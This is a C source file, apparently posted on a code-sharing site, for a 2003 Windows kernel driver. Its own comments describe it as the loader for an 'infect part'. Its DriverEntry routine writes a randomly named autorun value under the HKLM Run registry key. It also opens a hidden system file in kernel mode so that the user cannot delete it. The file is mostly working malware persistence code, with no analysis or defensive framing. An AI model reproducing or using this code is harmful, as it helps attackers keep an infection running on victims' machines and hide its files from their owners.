📄 hello.c
字号:
/*******************************************************************
Copyright (c) 2003 Green Asia Electronics.
Module Name:
Hello.c
Current Version :
v0.1
Abstract:
Whole driver initialize code.
Environment:
kernel mode only
Functions:
DriverEntry :
Initialize code per driver.
XGWriter_DriverUnload :
Unload code per driver.
Notes:
Copyright (c) 2003 Green Asia Electronics. All Rights Reserved.
Revision History:
Year Month Day Author Version Comment
2003 09 14 HenryShow v0.1 first version
2003 09 14 HenryShow V0.11 asm version, no data seg
2003 09 15 HenryShow V0.2 open c:\\a in kernel mode, in order to deny user delete it.
*******************************************************************/
///////////////////////////////////////////////////////////////////////////////////
#include "Hello.h"
///////////////////////////////////////////////////////////////////////////////////
/*******************************************************************
Current Version :
v0.1
Routine Prototype:
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
Routine Description:
Installable driver initialization entry point.
This entry point is called directly by the I/O system.
We use this entry point to add registry key to make system run our infect part.
Typically, we add a registry key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
and the key name and value are random, which is confirmed by infect part.
Arguments:
DriverObject - pointer to the driver object
RegistryPath - pointer to a unicode string representing the path
to driver-specific key in the registry
Return Value:
STATUS_SUCCESS if successful,
STATUS_UNSUCCESSFUL otherwise
Revision History:
Year Month Day Author Version Comment
2003 09 14 HenryShow v0.1 first version
2003 09 14 HenryShow v0.11 asm version.
*******************************************************************/
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS Status;
HANDLE RunKey;
WCHAR RunPath[128] = L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
UNICODE_STRING RegPath = {128, 128, RunPath};
OBJECT_ATTRIBUTES ObjAttr = {0x18, 0, &RegPath, 0, 0, 0};
WCHAR FileNameStr[60] = L"\\DosDevices\\C:\\A.txt";
UNICODE_STRING FileName = {60, 60, FileNameStr};
OBJECT_ATTRIBUTES FileAttr = {0x18, 0, &FileName, 0, 0, 0};
IO_STATUS_BLOCK IoStatusBlock;
HANDLE FileHandle;
Status = ZwOpenKey(&RunKey, KEY_ALL_ACCESS, &ObjAttr);
if (Status == STATUS_SUCCESS){
ZwSetValueKey(RunKey, &ValueName, 0, REG_SZ, RegKeyValue, sizeof(RegKeyValue) / sizeof(RegKeyValue[0]) * sizeof(WCHAR) );
ZwClose(RunKey);
}
Status = ZwCreateFile(&FileHandle, FILE_ALL_ACCESS, &FileAttr, &IoStatusBlock, 0, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, FILE_SHARE_READ, FILE_OPEN_IF, FILE_NON_DIRECTORY_FILE, NULL, 0);
DriverObject->DriverUnload = DriverUnload;
/*
NTSTATUS Status;
HANDLE RunKey;
OBJECT_ATTRIBUTES ObjAttr;
// we only interest about the registry.
ObjAttr.Length = sizeof(OBJECT_ATTRIBUTES);
ObjAttr.RootDirectory = NULL;
ObjAttr.ObjectName = &RegPath;
ObjAttr.Attributes = 0;
ObjAttr.SecurityDescriptor = NULL;
ObjAttr.SecurityQualityOfService = NULL;
Status = ZwOpenKey(&RunKey, KEY_ALL_ACCESS, &ObjAttr);
if (Status == STATUS_SUCCESS){
ZwSetValueKey(RunKey, &ValueName, 0, REG_SZ, RegKeyValue, sizeof(RegKeyValue) / sizeof(RegKeyValue[0]) * sizeof(WCHAR) );
ZwClose(RunKey);
}
DriverObject->DriverUnload = DriverUnload;
*/
return STATUS_SUCCESS;
}
///////////////////////////////////////////////////////////////////////////////////
VOID
DriverUnload(
IN PDRIVER_OBJECT DriverObject
)
{
// To do : free all global variable's memory which are be allocated in DriverEntry.
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -